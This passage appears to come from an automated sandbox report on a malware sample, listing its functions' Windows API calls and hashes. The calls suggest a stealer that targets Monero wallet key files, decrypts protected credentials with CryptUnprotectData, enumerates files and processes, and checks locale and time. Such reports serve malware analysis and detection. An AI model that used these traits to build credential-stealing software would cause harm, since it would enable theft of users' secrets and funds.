                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: *W$&SA$Ao$Ao$Qoo}$S^m$fmu>$k
                            • API String ID: 0-2769721139
                            • Opcode ID: aad46151c938c2cde5d3b060af5cd579f327f753d82eb25dd0d24425652a0acf
                            • Instruction ID: b9cce1f85eba55d3da258fe0b17b3e4935406a549472ca8cb7e90fd6ea9fc07f
                            • Opcode Fuzzy Hash: aad46151c938c2cde5d3b060af5cd579f327f753d82eb25dd0d24425652a0acf
                            • Instruction Fuzzy Hash: D9B206F3A082109FE3046E2DEC8567AFBE5EF94320F1A893DE6C4C7744E63598458796
                            Function 00357B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            • GetKeyboardLayoutList.USER32(00000000,00000000,003605AF), ref: 00357BE1
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00357BF9
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00357C0D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00357C62
                            • LocalFree.KERNEL32(00000000), ref: 00357D22
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 057319130775246f392211097fff77174c7d56e16d2607d3a70751c8e2dd8bc6
                            • Instruction ID: 9666f6d0d2da6f650ceb0f5366fcfd7c4a407eed8eec851a26380b3d228e3f21
                            • Opcode Fuzzy Hash: 057319130775246f392211097fff77174c7d56e16d2607d3a70751c8e2dd8bc6
                            • Instruction Fuzzy Hash: BB416F71940218ABDB25DB94DC89FEEB7B8FF44701F1042D9E809661A0DB342F89DFA1
                            Function 0070966C Relevance: 10.4, Strings: 7, Instructions: 1631COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: -Rj$1w{$4I_]$4}$Fhw~$c7ok$'_
                            • API String ID: 0-3014980375
                            • Opcode ID: d58239d1a4531e32e515af4d1c8762768e8c3ede36a98e85ab26a7393418b108
                            • Instruction ID: 6823c716f477b739b14ea8643fe09e42b80134db0de6edd3eb2d6bca04cbcd43
                            • Opcode Fuzzy Hash: d58239d1a4531e32e515af4d1c8762768e8c3ede36a98e85ab26a7393418b108
                            • Instruction Fuzzy Hash: 08B206F360C2049FE304AE29DC4567AFBE9EF94720F1A893DE6C5C7744EA3598418693
                            Function 0034E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00360D73), ref: 0034E4A2
                            • StrCmpCA.SHLWAPI(?,003614F8), ref: 0034E4F2
                            • StrCmpCA.SHLWAPI(?,003614FC), ref: 0034E508
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0034EBDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: 44fe1b5cd0264dc1a591374727c2f093bf46cbce2cfbac4aabe97702085b9577
                            • Instruction ID: bd99af1c764b13050292e4e42d58e7bbb33be44c4de7270e73a9c6b8cc054bb4
                            • Opcode Fuzzy Hash: 44fe1b5cd0264dc1a591374727c2f093bf46cbce2cfbac4aabe97702085b9577
                            • Instruction Fuzzy Hash: 581264319105189ADB16FB60DC96EED7778BF54301F404299B90AAA0A1FF306F4DEF92
                            Function 00349AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349AEF
                            • LocalAlloc.KERNEL32(00000040,?,?,?,00344EEE,00000000,?), ref: 00349B01
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349B2A
                            • LocalFree.KERNEL32(?,?,?,?,00344EEE,00000000,?), ref: 00349B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: N4
                            • API String ID: 4291131564-2877227682
                            • Opcode ID: c8d86198524a614e365e67a9e2ac70a8e3a1fc96c2c72a4bc366107f59e599d0
                            • Instruction ID: 567afea89e5745b0b3eefb066b0798207c86a85a6f2e5689ecae565c07cc3599
                            • Opcode Fuzzy Hash: c8d86198524a614e365e67a9e2ac70a8e3a1fc96c2c72a4bc366107f59e599d0
                            • Instruction Fuzzy Hash: 60119DB4240208EFEB10CF64DC95FAA77B5EB89700F208059FE159F390C7B6A901DBA0
                            Function 00711BD7 Relevance: 7.9, Strings: 5, Instructions: 1666COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: QO}$kE]~$oCV6$}u~$}ar
                            • API String ID: 0-921041181
                            • Opcode ID: 14e5af26baa838caa063e99d92a19dc5c632aaf5b6b740b3b30a9a9178f34ea0
                            • Instruction ID: 00282356f84f9dff55bdf66dffca54ecb17491cfac1cec2f70b79b14a2e740dc
                            • Opcode Fuzzy Hash: 14e5af26baa838caa063e99d92a19dc5c632aaf5b6b740b3b30a9a9178f34ea0
                            • Instruction Fuzzy Hash: 90B229F3A082049FE3046E2DEC8567ABBE5EFD4720F1A4A3DEAC5C3744E63558058697
                            Function 0034C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0034C871
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0034C87C
                            • lstrcat.KERNEL32(?,00360B46), ref: 0034C943
                            • lstrcat.KERNEL32(?,00360B47), ref: 0034C957
                            • lstrcat.KERNEL32(?,00360B4E), ref: 0034C978
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: c12fb9e60bc67982baf020c27f071b13cf81efe96722a941c3a9a04e41ffd6f3
                            • Instruction ID: f0e41e7eed53afa36956fded784817d9190ee5f226a6ec881647ce9157ab2f0c
                            • Opcode Fuzzy Hash: c12fb9e60bc67982baf020c27f071b13cf81efe96722a941c3a9a04e41ffd6f3
                            • Instruction Fuzzy Hash: 06416DB5D1421AEBDB10CF90DC89BEEB7B8AB48304F1041A9E509B7284D7746A84DFA1
                            Function 00356920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 0035696C
                            • sscanf.NTDLL ref: 00356999
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003569B2
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003569C0
                            • ExitProcess.KERNEL32 ref: 003569DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: 898174d59afdb8943682eee2f679b0da9e78d59da4f3048ec11cfe90cf8cb153
                            • Instruction ID: 81137ec2bc5a5aa6c811636b0a3d515ef294a63a415a1306fd6d87c1210466b7
                            • Opcode Fuzzy Hash: 898174d59afdb8943682eee2f679b0da9e78d59da4f3048ec11cfe90cf8cb153
                            • Instruction Fuzzy Hash: 7D21EA75D10208ABDF04EFE4D945DEEB7B5BF48301F04852AE806F3250EB345609DB65
                            Function 00347240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0034724D
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00347254
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00347281
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 003472A4
                            • LocalFree.KERNEL32(?), ref: 003472AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: b4cde7c109542132fcbc2116ad5ab3356103345614bbf965b6bd3304c66312cf
                            • Instruction ID: 2b8e4a7125cbc6d7f52cf407a5c5edfe91f2d53dea5e17f15c8bb7a396634b91
                            • Opcode Fuzzy Hash: b4cde7c109542132fcbc2116ad5ab3356103345614bbf965b6bd3304c66312cf
                            • Instruction Fuzzy Hash: 78010CB5A40208BBEB14DFD4CD4AF9E77B8EB44B00F104555FB05BA2C0D6B0AA049B65
                            Function 00359600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0035961E
                            • Process32First.KERNEL32(00360ACA,00000128), ref: 00359632
                            • Process32Next.KERNEL32(00360ACA,00000128), ref: 00359647
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 0035965C
                            • CloseHandle.KERNEL32(00360ACA), ref: 0035967A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: dc5b5e4e0479a63d829bb8ff8ed4c4a63d13ac3596c1278522377fdc98eb28c9
                            • Instruction ID: f1356414889b343083a51e497c3b00fefbaccb9f85040f5b90a263b534831446
                            • Opcode Fuzzy Hash: dc5b5e4e0479a63d829bb8ff8ed4c4a63d13ac3596c1278522377fdc98eb28c9
                            • Instruction Fuzzy Hash: 61014C75A00208EBDB11DFA4CC48FEDB7F8EB18311F10418AAD06A7250D7349B48DF51
                            Function 00358EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,00345184,40000001,00000000,00000000,?,00345184), ref: 00358EC0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: 3ccafde9dc7febab0991ca093fb0546f9150b83ec36bb0e0e041d2899e7716f5
                            • Instruction ID: de79274782890ab6157e29351952b5b57f49d752b180212f29ec8ae429d0a281
                            • Opcode Fuzzy Hash: 3ccafde9dc7febab0991ca093fb0546f9150b83ec36bb0e0e041d2899e7716f5
                            • Instruction Fuzzy Hash: BC110670200208AFDB01CF64EC85FAA33A9AF89305F109448FD1A9B260DB35E849EB60
                            Function 00357A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00FBDEC0,00000000,?,00360E10,00000000,?,00000000,00000000), ref: 00357A63
